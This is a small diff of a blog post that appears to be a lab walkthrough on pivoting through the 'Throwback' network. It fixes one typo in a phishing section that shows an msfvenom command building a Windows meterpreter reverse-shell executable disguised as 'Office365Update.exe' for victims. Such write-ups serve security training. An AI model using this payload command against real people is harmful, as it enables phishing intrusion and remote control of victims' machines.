lolkatz/github-pages-with-jekyll/_posts/2021-03-11-pivoting-throwback-network.md

 ## Gone phishing

-Before we login to the mail server and start sending phishing email, we got a little preparation to make.
+Before we login to the mail server and start sending phishing emails, we got a little preparation to make.
 We will craft the malicious executable, aka payload, that we will send to our potential victims by using this command:

 ````
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f exe -o Office365Update.exe